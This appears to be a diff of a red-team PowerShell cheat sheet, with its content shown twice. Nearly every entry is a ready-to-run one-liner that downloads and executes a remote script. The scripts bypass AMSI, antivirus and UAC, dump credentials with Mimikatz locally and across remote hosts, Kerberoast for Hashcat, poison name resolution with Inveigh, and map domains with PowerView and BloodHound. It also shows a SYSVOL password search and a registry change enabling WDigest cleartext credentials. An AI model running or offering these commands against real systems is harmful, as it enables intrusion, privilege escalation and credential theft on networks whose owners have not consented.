josephb4224 · August 28, 2025 00:26
diff --git a/RedTeam_CheatSheet.ps1 b/RedTeam_CheatSheet.ps1
 # PowerShell One-Liners:

 Collection of PowerShell one-liners for red teamers & penetration testers to use at various stages of testing.

 ---

 > Invoke-AMSIBypass & start PowerShell prompt as Administrator [Or replace to run any other command]:

 ```powershell
 powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/insi2304/fd88750c43dfb3d781b461cedca395d4/raw/9f3de1e0bc3da4ecbdfa339ef16b9b84f8b7311f/Invoke-IndraS-AvBypass.ps1');Invoke-IndraS-AvBypass"
 ```

 > Invoke-BypassUAC & start PowerShell prompt as Administrator [Or replace to run any other command]:

 ```powershell
 powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
 ```

 > Invoke-Mimikatz: Dump credentials from memory:

 ```powershell
 powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;"
 ```

 > Import Mimikatz Module to run further commands:

 ```powershell
 powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
 ```

 > Invoke-MassMimikatz:
 > Use to dump creds on remote host [replace `$env:computername` with target server name(s)]:

 ```powershell
 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
 ```

 > PowerUp: Privilege escalation checks:

 ```powershell
 powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”
 ```

 > Invoke-Inveigh and log output to file:

 ```powershell
 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y  –Proxy Y -LogOutput Y -FileOutput Y"
 ```

 > Invoke-Kerberoast and provide Hashcat compatible hashes:

 ```powershell
 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
 ```

 > Invoke-ShareFinder and print output to file:

 ```powershell
 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
 ```

 > Import PowerView Module to run further commands:

 ```powershell
 powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
 ```

 > Invoke-Bloodhound:

 ```powershell
 powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
 ```

 > Find GPP Passwords in SYSVOL:

 ```powershell
 findstr /S cpassword $env:logonserver\sysvol\*.xml
 findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
 ```

 > Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]:

 ```powershell
 runas /user:DOMAIN\USER /noprofile powershell.exe
 ```

 > Insert reg key to enable Wdigest on newer versions of Windows:

 ```powershell
 reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
 ```
	# PowerShell One-Liners:

	Collection of PowerShell one-liners for red teamers & penetration testers to use at various stages of testing.

	---

	> Invoke-AMSIBypass & start PowerShell prompt as Administrator [Or replace to run any other command]:

	```powershell
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/insi2304/fd88750c43dfb3d781b461cedca395d4/raw/9f3de1e0bc3da4ecbdfa339ef16b9b84f8b7311f/Invoke-IndraS-AvBypass.ps1');Invoke-IndraS-AvBypass"
	```

	> Invoke-BypassUAC & start PowerShell prompt as Administrator [Or replace to run any other command]:

	```powershell
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
	```

	> Invoke-Mimikatz: Dump credentials from memory:

	```powershell
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;"
	```

	> Import Mimikatz Module to run further commands:

	```powershell
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
	```

	> Invoke-MassMimikatz:
	> Use to dump creds on remote host [replace `$env:computername` with target server name(s)]:

	```powershell
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'\|Invoke-MassMimikatz -Verbose"
	```

	> PowerUp: Privilege escalation checks:

	```powershell
	powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”
	```

	> Invoke-Inveigh and log output to file:

	```powershell
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
	```

	> Invoke-Kerberoast and provide Hashcat compatible hashes:

	```powershell
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
	```

	> Invoke-ShareFinder and print output to file:

	```powershell
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess\|Out-File -FilePath sharefinder.txt"
	```

	> Import PowerView Module to run further commands:

	```powershell
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
	```

	> Invoke-Bloodhound:

	```powershell
	powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
	```

	> Find GPP Passwords in SYSVOL:

	```powershell
	findstr /S cpassword $env:logonserver\sysvol\*.xml
	findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
	```

	> Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]:

	```powershell
	runas /user:DOMAIN\USER /noprofile powershell.exe
	```

	> Insert reg key to enable Wdigest on newer versions of Windows:

	```powershell
	reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
	```
No results found